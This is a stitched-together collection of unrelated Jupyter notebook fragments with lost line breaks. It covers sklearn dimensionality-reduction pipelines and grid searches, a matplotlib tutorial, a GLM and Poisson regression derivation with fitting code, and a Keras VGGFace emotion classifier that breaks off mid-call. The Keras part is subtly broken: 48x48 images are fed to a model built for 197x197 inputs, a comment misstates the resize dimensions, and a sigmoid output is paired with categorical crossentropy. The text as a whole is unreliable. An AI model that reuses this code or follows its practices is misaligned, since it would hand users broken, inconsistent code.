print(DR_pipeline_accuracy_calculator(lin_svc_BIRCH_pipeline)) # rnd clf rnd_clf_KMeans_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), KMeans()) print(DR_pipeline_accuracy_calculator(rnd_clf_KMeans_pipeline)) rnd_clf_BIRCH_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), Birch()) print(DR_pipeline_accuracy_calculator(rnd_clf_BIRCH_pipeline)) # extra trees extra_trees_clf_KMeans_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), KMeans()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_KMeans_pipeline)) 
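# In the clustering pipelines in this cell, the clustering step (KMeans or Birch) acts as a
# transformer: inside an sklearn Pipeline its transform() output, the distances from each sample
# to the learned cluster centroids, becomes the feature set the final classifier is trained on.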
extra_trees_clf_BIRCH_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), Birch()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_BIRCH_pipeline))0.825+ **Using DR (DR Techniques)** PCA, ~~IncrementalPCA~~, KernelPCA~~TSNE~~, LocallyLinearEmbedding, ~~MDS~~, IsomapLinearDiscriminantAnalysis~~GaussianRandomProjection~~, ~~SparseRandomProjection~~# log reg log_reg_PCA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), PCA()) print(DR_pipeline_accuracy_calculator(log_reg_PCA_pipeline)) log_reg_KernelPCA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), KernelPCA()) print(DR_pipeline_accuracy_calculator(log_reg_KernelPCA_pipeline)) log_reg_LLE_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(log_reg_LLE_pipeline)) log_reg_Isomap_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), Isomap()) print(DR_pipeline_accuracy_calculator(log_reg_Isomap_pipeline)) log_reg_LDA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(log_reg_LDA_pipeline)) # lin svc lin_svc_PCA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), PCA()) print(DR_pipeline_accuracy_calculator(lin_svc_PCA_pipeline)) lin_svc_KernelPCA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), KernelPCA()) print(DR_pipeline_accuracy_calculator(lin_svc_KernelPCA_pipeline)) lin_svc_LLE_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(lin_svc_LLE_pipeline)) lin_svc_Isomap_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), Isomap()) print(DR_pipeline_accuracy_calculator(lin_svc_Isomap_pipeline)) lin_svc_LDA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(lin_svc_LDA_pipeline)) # rnd clf rnd_clf_PCA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), PCA()) print(DR_pipeline_accuracy_calculator(rnd_clf_PCA_pipeline)) rnd_clf_KernelPCA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), KernelPCA()) print(DR_pipeline_accuracy_calculator(rnd_clf_KernelPCA_pipeline)) rnd_clf_LLE_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(rnd_clf_LLE_pipeline)) rnd_clf_Isomap_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), Isomap()) print(DR_pipeline_accuracy_calculator(rnd_clf_Isomap_pipeline)) rnd_clf_LDA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(rnd_clf_LDA_pipeline)) # extra trees extra_trees_clf_PCA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), PCA()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_PCA_pipeline)) extra_trees_clf_KernelPCA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), KernelPCA()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_KernelPCA_pipeline)) extra_trees_clf_LLE_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_LLE_pipeline)) extra_trees_clf_Isomap_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), Isomap()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_Isomap_pipeline)) 
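# Editor's note (clarification, not in the original notebook): with default arguments
# PCA() and KernelPCA() keep all components, so with a linear kernel they are essentially
# a rotation of the feature space rather than a reduction, which helps explain why their
# scores stay close to the untransformed models; LinearDiscriminantAnalysis projects to at
# most n_classes - 1 dimensions, and LocallyLinearEmbedding/Isomap default to only 2
# components.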
extra_trees_clf_LDA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_LDA_pipeline))0.9625+ **searchCV for DR Pipelines** ~~lin_svc_BIRCH_pipeline 96.25 ~~~~log_reg_PCA_pipeline 97.5~~~~log_reg_KernelPCA_pipeline~~ 97.5log_reg_LDA_pipeline 96.25lin_svc_PCA_pipeline 98.75~~lin_svc_KernelPCA_pipeline~~ 98.75rnd_clf_LDA_pipeline 97.5 extra_trees_clf_PCA_pipeline 97.5~~extra_trees_clf_KernelPCA_pipeline~~ 97.5extra_trees_clf_LDA_pipeline 96.25lin_svc_BIRCH_pipeline.named_steps["DR_algo"] # lin_svc_BIRCH_pipeline 96.25 run_lin_svc_BIRCH_pipeline = False if run_lin_svc_BIRCH_pipeline: param_grid_lin_svc_BIRCH_pipeline = [ {"DR_algo__threshold": [0.5, 1, 10, 15], "DR_algo__branching_factor": [50, 75, 100], "DR_algo__n_clusters": [3, 10, 15, 30] } ] grid_cv_lin_svc_BIRCH_pipeline = GridSearchCV(lin_svc_BIRCH_pipeline, param_grid_lin_svc_BIRCH_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc_BIRCH_pipeline.fit(X_train, y_train) # grid_cv_lin_svc_BIRCH_pipeline.best_score_ 0.9357142857142857 # log_reg_PCA_pipeline 97.5 run_log_reg_PCA_pipeline = False if run_log_reg_PCA_pipeline: param_grid_log_reg_PCA_pipeline = [ {"DR_algo__n_components": [0.90, 0.95, 1.0] } ] grid_cv_log_reg_PCA_pipeline = GridSearchCV(log_reg_PCA_pipeline, param_grid_log_reg_PCA_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg_PCA_pipeline.fit(X_train, y_train) # grid_cv_log_reg_PCA_pipeline.best_score_ 0.9428571428571428 param_kPCA = [ {"DR_algo__n_components": [0.90, 0.95, 1.0], "DR_algo__kernel": ["linear", "poly", "rbf", "sigmoid"], "DR_algo__degree": [3, 6, 9, 12] } ] kPCA_scores = [] def run_searchCV(param_grid): for pipeline in (log_reg_KernelPCA_pipeline, lin_svc_KernelPCA_pipeline, extra_trees_clf_KernelPCA_pipeline): searchcv = GridSearchCV(pipeline, param_kPCA, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) searchcv.fit(X_train, y_train) kPCA_scores.append(searchcv.best_score_) # run_searchCV(param_kPCA) # kPCA_scores [0.10714285714285714, 0.09642857142857142, 0.19285714285714284] param_grid_log_reg_PCA_pipeline = [ {"DR_algo__n_components": [0.90, 0.95, 1.0] } ] PCA_scores = [] def run_PCA_searchCV(): for pipeline in (lin_svc_PCA_pipeline, extra_trees_clf_PCA_pipeline): searchcv = GridSearchCV(pipeline, param_grid_log_reg_PCA_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) searchcv.fit(X_train, y_train) PCA_scores.append(searchcv.best_score_) # run_PCA_searchCV() # PCA_scores [0.95, 0.9285714285714285] lin_svc_PCA_pipeline_pred = lin_svc_PCA_pipeline.predict(X_test) print(accuracy_score(y_test, lin_svc_PCA_pipeline_pred)) lin_svc_KernelPCA_pipeline_pred = lin_svc_KernelPCA_pipeline.predict(X_test) print(accuracy_score(y_test, lin_svc_KernelPCA_pipeline_pred))0.975These notebooks can be found at https://github.com/jaspajjr/pydata-visualisation if you want to follow along https://matplotlib.org/users/intro.htmlMatplotlib is a library for making 2D plots of arrays in Python.* Has it's origins in emulating MATLAB, it can also be used in a Pythonic, object oriented way. * Easy stuff should be easy, difficult stuff should be possibleimport matplotlib.pyplot as plt import numpy as np import pandas as pd %matplotlib inlineEverything in matplotlib is organized in a hierarchy. At the top of the hierarchy is the matplotlib “state-machine environment” which is provided by the matplotlib.pyplot module. 
At this level, simple functions are used to add plot elements (lines, images, text, etc.) to the current axes in the current figure.Pyplot’s state-machine environment behaves similarly to MATLAB and should be most familiar to users with MATLAB experience.The next level down in the hierarchy is the first level of the object-oriented interface, in which pyplot is used only for a few functions such as figure creation, and the user explicitly creates and keeps track of the figure and axes objects. At this level, the user uses pyplot to create figures, and through those figures, one or more axes objects can be created. These axes objects are then used for most plotting actions. Scatter Plot To start with let's do a really basic scatter plot:plt.plot([0, 1, 2, 3, 4, 5], [0, 2, 4, 6, 8, 10]) x = [0, 1, 2, 3, 4, 5] y = [0, 2, 4, 6, 8, 10] plt.plot(x, y)What if we don't want a line?plt.plot([0, 1, 2, 3, 4, 5], [0, 2, 5, 7, 8, 10], marker='o', linestyle='') plt.xlabel('The X Axis') plt.ylabel('The Y Axis') plt.show();Simple example from matplotlibhttps://matplotlib.org/tutorials/intermediate/tight_layout_guide.htmlsphx-glr-tutorials-intermediate-tight-layout-guide-pydef example_plot(ax, fontsize=12): ax.plot([1, 2]) ax.locator_params(nbins=5) ax.set_xlabel('x-label', fontsize=fontsize) ax.set_ylabel('y-label', fontsize=fontsize) ax.set_title('Title', fontsize=fontsize) fig, ax = plt.subplots() example_plot(ax, fontsize=24) fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2) # fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, sharex=True, sharey=True) ax1.plot([0, 1, 2, 3, 4, 5], [0, 2, 5, 7, 8, 10]) ax2.plot([0, 1, 2, 3, 4, 5], [0, 2, 4, 9, 16, 25]) ax3.plot([0, 1, 2, 3, 4, 5], [0, 13, 18, 21, 23, 25]) ax4.plot([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]) plt.tight_layout()Date Plottingimport pandas_datareader as pdr df = pdr.get_data_fred('GS10') df = df.reset_index() print(df.info()) df.head() fig = plt.figure(figsize=(12, 8)) ax = fig.add_subplot(111) ax.plot_date(df['DATE'], df['GS10'])Bar Plotfig = plt.figure(figsize=(12, 8)) ax = fig.add_subplot(111) x_data = [0, 1, 2, 3, 4] values = [20, 35, 30, 35, 27] ax.bar(x_data, values) ax.set_xticks(x_data) ax.set_xticklabels(('A', 'B', 'C', 'D', 'E')) ;Matplotlib basicshttp://pbpython.com/effective-matplotlib.html Behind the scenes* matplotlib.backend_bases.FigureCanvas is the area onto which the figure is drawn * matplotlib.backend_bases.Renderer is the object which knows how to draw on the FigureCanvas * matplotlib.artist.Artist is the object that knows how to use a renderer to paint onto the canvas The typical user will spend 95% of their time working with the Artists.https://matplotlib.org/tutorials/intermediate/artists.htmlsphx-glr-tutorials-intermediate-artists-pyfig, (ax1, ax2) = plt.subplots( nrows=1, ncols=2, sharey=True, figsize=(12, 8)) fig.suptitle("Main Title", fontsize=14, fontweight='bold'); x_data = [0, 1, 2, 3, 4] values = [20, 35, 30, 35, 27] ax1.barh(x_data, values); ax1.set_xlim([0, 55]) #ax1.set(xlabel='Unit of measurement', ylabel='Groups') ax1.set(title='Foo', xlabel='Unit of measurement') ax1.grid() ax2.barh(x_data, [y / np.sum(values) for y in values], color='r'); ax2.set_title('Transformed', fontweight='light') ax2.axvline(x=.1, color='k', linestyle='--') ax2.set(xlabel='Unit of measurement') # Worth noticing this ax2.set_axis_off(); fig.savefig('example_plot.png', dpi=80, bbox_inches="tight")Logistic regression is one example of a wider class of Generalized LinearModels (GLMs). 
These GLMs have the following three key features* A target $Y$ variable distributed according to one of the exponential family of distributions (e.g., Normal, binomial, Poisson)* An equation that links the expected value of $Y$ with a linear combination of the observed variables (i.e., $\left\{ x_1,x_2,\ldots,x_n \right\}$). * A smooth invertible *link* function $g(x)$ such that $g(\mathbb{E}(Y)) = \sum_k \beta_k x_k$ Exponential FamilyHere is the one-parameter exponential family, $$f(y;\lambda) = e^{\lambda y - \gamma(\lambda)}$$ The *natural parameter* is $\lambda$ and $y$ is the sufficientstatistic. For example, for logistic regression, we have$\gamma(\lambda)=-\log(1+e^{\lambda})$ and $\lambda=\log{\frac{p}{1-p}}$. An important property of this exponential family is that $$\begin{equation}\mathbb{E}_{\lambda}(y) = \frac{d\gamma(\lambda)}{d\lambda}=\gamma'(\lambda)\end{equation}\label{eq:dgamma} \tag{1}$$ To see this, we compute the following, $$\begin{align*}1 &= \int f(y;\lambda) dy = \int e^{\lambda y - \gamma(\lambda)} dy \\0 &= \int \frac{df(y;\lambda)}{d\lambda} dy =\int e^{\lambda y-\gamma (\lambda)} \left(y-\gamma'(\lambda)\right) dy \\\int y e^{\lambda y-\gamma (\lambda )} dy &= \mathbb{E}_{\lambda}(y)=\gamma'(\lambda ) \end{align*}$$ Using the same technique, we also have, $$\mathbb{V}_{\lambda}(Y) = \gamma''(\lambda)$$ which explains the usefulness of this generalized notation for theexponential family. DevianceThe scaled Kullback-Leibler divergence is called the *deviance* asdefined below, $$D(f_1,f_2) = 2 \int f_1(y) \log{\frac{f_1(y)}{f_2(y)}}dy$$ **Hoeffding's Lemma.**Using our exponential family notation, we can write out the deviance asthe following, $$\begin{align*}\frac{1}{2} D(f(y;\lambda_1), f(y;\lambda_2)) & = \int f(y;\lambda_1)\log \frac{f(y;\lambda_1)}{f(y;\lambda_2)} dy \\ & = \int f(y;\lambda_1) ((\lambda_1-\lambda_2) y -(\gamma(\lambda_1)-\gamma(\lambda_2))) dy \\ & = \mathbb{E}_{\lambda_1} [ (\lambda_1-\lambda_2) y -(\gamma(\lambda_1)-\gamma(\lambda_2)) ] \\ & = (\lambda_1-\lambda_2) \mathbb{E}_{\lambda_1}(y) -(\gamma(\lambda_1)-\gamma(\lambda_2)) \\ & = (\lambda_1-\lambda_2) \mu_1 -(\gamma(\lambda_1)-\gamma(\lambda_2)) \end{align*}$$ where $\mu_1:=\mathbb{E}_{\lambda_1}(y)$. For the maximum likelihoodestimate $\hat{\lambda}_1$, we have $\mu_1=y$. Plugging thisinto the above equation gives the following, $$\begin{align*}\frac{1}{2} D(f(y;\hat{\lambda}_1),f(y;\lambda_2))&=(\hat{\lambda}_1-\lambda_2) y -(\gamma(\hat{\lambda}_1)-\gamma(\lambda_2)) \\&= \log{f(y;\hat{\lambda}_1)} - \log{f(y;\lambda_2)} \\&= \log\frac{f(y;\hat{\lambda}_1)}{f(y;\lambda_2)}\end{align*}$$ Taking the negative exponential of both sides gives, $$f(y;\lambda_2) = f(y;\hat{\lambda}_1) e^{-\frac{1}{2} D(f(y;\hat{\lambda}_1),f(y;\lambda_2)) }$$ Because $D$ is always non-negative, the likelihoodis maximized when the the deviance is zero. In particular,for the scalar case, it means that $y$ itself is thebest maximum likelihood estimate for the mean. 
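For a concrete instance (added here for illustration), take the Poisson case where $\gamma(\lambda)=e^{\lambda}$ and $\lambda=\log\mu$, so that $\hat{\lambda}_1=\log y$ and $\gamma(\hat{\lambda}_1)=y$. The expression above then becomes the familiar Poisson unit deviance, $$D\big(f(y;\hat{\lambda}_1),f(y;\mu)\big) = 2\left[y\log\frac{y}{\mu}-(y-\mu)\right]$$ which, summed over the observations, is the quantity driven down when the Poisson GLM example later in this section is fit.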
Also,$f(y;\hat{\lambda}_1)$ is called the *saturated* model.We write Hoeffding's Lemma as the following, $$\begin{equation}f(y;\mu) = f(y;y)e^{-\frac{1}{2} D(f(y;y),f(y;\mu))} \end{equation}\label{eq:lemma} \tag{2}$$ to emphasize that $f(y;y)$ is the likelihood function when the mean is replaced by the sample itself and $f(y;\mu)$ is the likelihood function when the mean is replaced by $\mu$.Vectorizing Equation ([2](eq:lemma)) using mutual independence gives thefollowing, $$f(\mathbf{y};\boldsymbol{\mu}) = e^{-\sum_i D(y_i,\mu_i)} \prod f(y_i;y_i)$$ The idea now is to minimize the deviance by deriving, $$\boldsymbol{\mu}(\boldsymbol{\beta}) = g^{-1}(\mathbf{M}^T\boldsymbol{\beta})$$ This means the the MLE $\hat{\boldsymbol{\beta}}$ is thebest $p\times 1$ vector $\boldsymbol{\beta}$ that minimizes thetotal deviance where $g$ is the *link* function and $\mathbf{M}$ isthe $p\times n$ *structure* matrix. This is the key step with GLMestimation because it reduces the number of parameters from $n$ to$p$. The structure matrix is where the associated $x_i$ data entersinto the problem. Thus, GLM maximum likelihood fitting minimizes thetotal deviance like plain linear regression minimizes the sum ofsquares.With the following, $$\boldsymbol{\lambda} = \mathbf{M}^T \boldsymbol{\beta}$$ with $2\times n$ dimensional $\mathbf{M}$. The corresponding jointdensity function is the following, $$f(\mathbf{y};\beta)=e^{\boldsymbol{\beta}^T\boldsymbol{\xi}-\psi(\boldsymbol{\beta})} f_0(\mathbf{y})$$ where $$\boldsymbol{\xi} = \mathbf{M} \mathbf{y}$$ and $$\psi(\boldsymbol{\beta}) = \sum \gamma(\mathbf{m}_i^T \boldsymbol{\beta})$$ where now the sufficient statistic is $\boldsymbol{\xi}$ and theparameter vector is $\boldsymbol{\beta}$, which fits into our exponentialfamily format, and $\mathbf{m}_i$ is the $i^{th}$ column of $\mathbf{M}$. Given this joint density, we can compute the log likelihood as the following, $$\ell = \boldsymbol{\beta}^T\boldsymbol{\xi}-\psi(\boldsymbol{\beta})$$ To maximize this likelihood, we take the derivative of this withrespect to $\boldsymbol{\beta}$ to obtain the following, $$\frac{d\ell}{d\boldsymbol{\beta}}=\mathbf{M}\mathbf{y}-\mathbf{M}\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})$$ since $\gamma'(\mathbf{m}_i^T \boldsymbol{\beta}) =\mathbf{m}_i^T \mu_i(\boldsymbol{\beta})$ and (c.f. Equation ([1](eq:dgamma))), $\gamma' = \mu_{\lambda}$. Setting this derivative equal to zero gives the conditionsfor the maximum likelihood solution, $$\begin{equation}\mathbf{M}(\mathbf{y}- \boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})) = \mathbf{0}\end{equation}\label{eq:conditions} \tag{3}$$ where $\boldsymbol{\mu}$ is the element-wise inverse of the link function. This leads us to exactly the same place we started: trying to regress $\mathbf{y}$ against $\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})$. ExampleThe structure matrix $\mathbf{M}$ is where the $x_i$ data associated with the corresponding $y_i$ enters the problem. 
If we choose $$\mathbf{M}^T = [\mathbf{1}, \mathbf{x}]$$ where $\mathbf{1}$ is an $n$-length vector and $$\boldsymbol{\beta} = [\beta_0, \beta_1]^T$$ with $\mu(x) = 1/(1+e^{-x})$, we have the original logistic regression problem.Generally, $\boldsymbol{\mu}(\boldsymbol{\beta})$ is a nonlinearfunction and thus we regress against our transformed variable $\mathbf{z}$ $$\mathbf{z} = \mathbf{M}^T\boldsymbol{\beta} + \diag(g'(\boldsymbol{\mu}))(\mathbf{y}-\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta}))$$ This fits the format of the Gauss Markov(see [ch:stats:sec:gauss](ch:stats:sec:gauss)) problem and has the following solution, $$\begin{equation}\hat{\boldsymbol{\beta}}=(\mathbf{M} \mathbf{R}_z^{-1}\mathbf{M}^T)^{-1}\mathbf{M} \mathbf{R}_z^{-1}\mathbf{z}\end{equation}\label{eq:bhat} \tag{4}$$ where $$\mathbf{R}_z:=\mathbb{V}(\mathbf{z})=\diag(g'(\boldsymbol{\mu}))^2\mathbf{R}=\mathbf{v}(\mu)\diag(g'(\boldsymbol{\mu}))^2\mathbf{I}$$ where $g$ is the link function and $\mathbf{v}$ is the variancefunction on the designated distribution of the $y_i$.Thus, $\hat{\boldsymbol{\beta}}$ has the following covariance matrix, $$\mathbb{V}(\hat{\boldsymbol{\beta}}) = (\mathbf{M}\mathbf{R}_z^{-1}\mathbf{M}^T)^{-1}$$ These results allow inferences about the estimated parameters$\hat{\boldsymbol{\beta}}$. We can easily write Equation ([4](eq:bhat))as an iteration as follow, $$\hat{\boldsymbol{\beta}}_{k+1}=(\mathbf{M} \mathbf{R}_{z_k}^{-1}\mathbf{M}^T)^{-1}\mathbf{M} \mathbf{R}_{z_k}^{-1}\mathbf{z}_k$$ ExampleConsider the data shown in [Figure](fig:glm_003). Note that the variance ofthe data increases for each $x$ and the data increases as a power of $x$ along$x$. This makes this data a good candidate for a Poisson GLM with $g(\mu) =\log(\mu)$.%matplotlib inline from scipy.stats.distributions import poisson import statsmodels.api as sm from matplotlib.pylab import subplots import numpy as np def gen_data(n,ns=10): param = n**2 return poisson(param).rvs(ns) fig,ax=subplots() xi = [] yi = [] for i in [2,3,4,5,6]: xi.append([i]*10) yi.append(gen_data(i)) _=ax.plot(xi[-1],yi[-1],'ko',alpha=.3) _=ax.axis(xmin=1,xmax=7) xi = np.array(xi) yi = np.array(yi) x = xi.flatten() y = yi.flatten() _=ax.set_xlabel('x'); fig.savefig('fig-machine_learning/glm_003.png')-->Some data for Poisson example.We can use our iterative matrix-based approach. The following code initializes the iteration.M = np.c_[x*0+1,x].T gi = np.exp # inverse g link function bk = np.array([.9,0.5]) # initial point muk = gi(M.T @ bk).flatten() Rz = np.diag(1/muk) zk = M.T @ bk + Rz @ (y-muk)and this next block establishes the main iterationwhile abs(sum(M @ (y-muk))) > .01: # orthogonality condition as threshold Rzi = np.linalg.inv(Rz) bk = (np.linalg.inv(M @ Rzi @ M.T)) @ M @ Rzi @ zk muk = gi(M.T @ bk).flatten() Rz =np.diag(1/muk) zk = M.T @ bk + Rz @ (y-muk)with corresponding final $\boldsymbol{\beta}$ computed as the following,print(bk)[0.72758176 0.48763741]with corresponding estimated $\mathbb{V}(\hat{\boldsymbol{\beta}})$ asprint(np.linalg.inv(M @ Rzi @ M.T))[[ 0.01850392 -0.0035621 ] [-0.0035621 0.00072885]]The orthogonality condition Equation ([3](eq:conditions)) is the following,print(M @ (y-muk))[-4.90472131e-05 -2.62970365e-04]For comparison, the `statsmodels` module provides the Poisson GLM object.Note that the reported standard error is the square root of the diagonal elements of $\mathbb{V}(\hat{\boldsymbol{\beta}})$. 
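A quick numerical check (an editor's addition, using the `M` and `Rzi` arrays computed above): the implied standard errors are the square roots of the diagonal of that covariance matrix, and they can be compared against the `std err` column of the statsmodels summary that follows.
print(np.sqrt(np.diag(np.linalg.inv(M @ Rzi @ M.T))))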
A plot of the data and the fitted model is shown below in Figure ([fig:glm_004](fig:glm_004)).pm=sm.GLM(y, sm.tools.add_constant(x), family=sm.families.Poisson()) pm_results=pm.fit() pm_results.summary() b0,b1=pm_results.params fig,ax=subplots() _=ax.plot(xi[:,0],np.exp(xi[:,0]*b1+b0),'-o'); _=ax.plot(xi,yi,'ok',alpha=.3); fig.savefig('fig-machine_learning/glm_004.png') _=ax.set_xlabel('x');!pip install keras !pip install keras_vggface !pip install pandas !pip install scikit_image import numpy as np import pandas as pd import sys,os from skimage.transform import resize from keras import backend as K from keras.utils import to_categorical from keras_vggface.vggface import VGGFace from keras.models import Model from keras.layers import Flatten, Dense from keras.preprocessing.image import ImageDataGenerator from keras.optimizers import Adam from keras.callbacks import TensorBoard, LearningRateScheduler, ReduceLROnPlateau, EarlyStopping, Callback from keras import optimizers from google.colab import drive from keras.layers import Input from keras.layers import Input, Dense, Conv2D, BatchNormalization, RepeatVector, Multiply, Permute, Reshape,MaxPooling2D, Flatten, Dropout, InputLayer,Activation from keras.models import Sequential from keras.optimizers import Adam from keras import optimizers import keras from keras.regularizers import l2 folder = "/content/drive/Colab Notebooks/" img_height, img_width = 197, 197 # Declaration of Parameters num_classes = 7 epochs_top_layers = 5 epochs_all_layers = 50 batch_size = 128 input_shape=(img_height, img_width,3) from google.colab import drive drive.mount('/content/drive', force_remount=True) filepath = "/content/drive/My Drive/Colab Notebooks/" sys.path.insert(0, filepath) os.chdir(filepath) train_dir='train.csv' test_dir='test.csv' wdata = pd.read_csv(train_dir) data=wdata.iloc[1:1000,] ddt=wdata.iloc[1001:1300,] gd=pd.read_csv(test_dir) print(gd.size) test=gd.iloc[0:1794,] #for better accuracy train on more data base_model = VGGFace( model = 'resnet50', include_top = False, weights = 'vggface', input_shape = (img_height, img_width, 3)) base_model.summary() x = base_model.output x = Flatten()(x) x = Dense(1024, activation = 'relu')(x) predictions = Dense(num_classes, activation = 'softmax')(x) # The model to be trained model = Model(inputs = base_model.input, outputs = predictions) i = Input(shape=(197,197,3)) o1 = Conv2D(32, kernel_size=(3, 3), activation=None)(i) o2 = BatchNormalization()(o1) o3 = Conv2D(64, kernel_size=(3,3),activation=None)(o2) o4 = BatchNormalization()(o3) o1 = Conv2D(128,kernel_size=(3,3),activation=None)(o1) o4 = Activation('relu')(o4) o4 = Dropout(0.25)(o4) o5 = keras.layers.add([o1,o3,o4]) o5 = BatchNormalization()(o5) o5 = Activation('relu')(o5) attn = Dense(1, activation='tanh')(o5) attn = Flatten()(attn) attn = Activation('softmax')(attn) attn = RepeatVector(64)(attn) attn = Permute([2, 1])(attn) o5 = Reshape((193,64))(o5) o6 = Multiply()([o5, attn]) o6 = Flatten()(o6) o6 = Dense(12, activation=None)(o6) o6 = BatchNormalization()(o6) o6 = Activation('relu')(o6) o6 = Dropout(0.5)(o6) o6 = Dense(7,activation='softmax')(o6) model_finetunedd = Model(inputs=i,outputs=o6) print("model") model_finetuned = Sequential() model_finetuned.add(model) model_finetuned.add(Dense(32, activation='relu', input_dim=input_shape)) model_finetuned.add(Dropout(0.25)) model_finetuned.add(Dense(64, activation='relu')) model_finetuned.add(Dropout(0.5)) model_finetuned.add(Dense(7, activation='sigmoid')) 
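# Editor's note (suggestion, not in the original notebook): the labels are one-hot encoded
# over 7 mutually exclusive emotion classes and the loss below is categorical_crossentropy,
# so a softmax output layer is the conventional choice, e.g.
# model_finetuned.add(Dense(7, activation='softmax')); the sigmoid above scores each class
# independently instead of producing a probability distribution over the classes.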
model_finetuned.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-5), metrics=['accuracy']) model_finetuned.summary() def preprocess_input(x): x -= 128.8006 # np.mean(train_dataset) return x # Function to read the data from the csv file, increase the size of the images and return the images and their labels def get_data(data): pixels = data['pixels'].tolist() images = np.empty((len(data), 48,48, 3)) i = 0 for pixel_sequence in pixels: single_image = [float(pixel) for pixel in pixel_sequence.split(' ')] # Extraction of each single single_image = np.asarray(single_image).reshape(48, 48) # Dimension: 48x48 single_image = resize(single_image, (48,48), order = 3, mode = 'constant') # Dimension: 139x139x3 (Bicubic) ret = np.empty((48,48, 3)) ret[:, :, 0] = single_image ret[:, :, 1] = single_image ret[:, :, 2] = single_image images[i, :, :, :] = ret i += 1 images = preprocess_input(images) labels = to_categorical(data['emotion']) return images, labels # Data preparation train_data_x, train_data_y = get_data(data) val_data = get_data(ddt) train_datagen = ImageDataGenerator( rotation_range = 10, shear_range = 10, # 10 degrees zoom_range = 0.1, fill_mode = 'reflect', horizontal_flip = True) # Takes numpy data & label arrays, and generates batches of augmented/normalized data. Yields batcfillhes indefinitely, in an infinite loop # x: Data. Should have rank 4. In case of grayscale data, the channels axis should have value 1, and in case of RGB data, # it should have value 3 # y: Labels # batch_size: Int (default: 32) train_generator = train_datagen.flow( train_data_x, train_data_y, batch_size = batch_size) model_finetuned.compile( optimizer = Adam(lr = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-08, decay = 0.0), loss = 'categorical_crossentropy', metrics = ['accuracy']) model_finetuned.fit_generator( generator = train_generator, steps_per_epoch = len(train_data_x) // batch_size, # samples_per_epoch / batch_size epochs = 1, validation_data = val_data) #fine-tuning the model by unfreezing the convolution layers for layer in model.layers: layer.trainable = True from keras import optimizers model.compile( optimizer = optimizers.SGD(lr = 1e-4, momentum = 0.9, decay = 0.0, nesterov = True), loss = 'categorical_crossentropy', metrics = ['accuracy']) tensorboard_all_layers = TensorBoard( log_dir = folder + '/logs_all_layers', histogram_freq = 0, write_graph = True, write_grads = False, write_images = True) #save progress in drive def scheduler(epoch): updated_lr = K.get_value(model.optimizer.lr) * 0.5 if (epoch % 3 == 0) and (epoch != 0): K.set_value(model.optimizer.lr, updated_lr) print(K.get_value(model.optimizer.lr)) return K.get_value(model.optimizer.lr) # Learning rate scheduler # schedule: a function that takes an epoch index as input (integer, indexed from 0) and current learning #ate and returns a new learning rate as output (float) reduce_lr = LearningRateScheduler(scheduler) reduce_lr_plateau = ReduceLROnPlateau( monitor = 'val_loss', factor = 0.5, patience = 3, mode = 'auto', min_lr = 1e-8) # Stop training when a monitored quantity has stopped improving # monitor: Quantity to be monitored # patience: Number of epochs with no improvement after which training will be stopped # mode: One of {auto, min, max} early_stop = EarlyStopping( monitor = 'val_loss', patience = 10, mode = 'auto') model.fit_generator( generator = train_generator, steps_per_epoch = len(train_data_x) // batch_size, # samples_per_epoch / batch_size epochs = 1, validation_data = val_data, callbacks = 
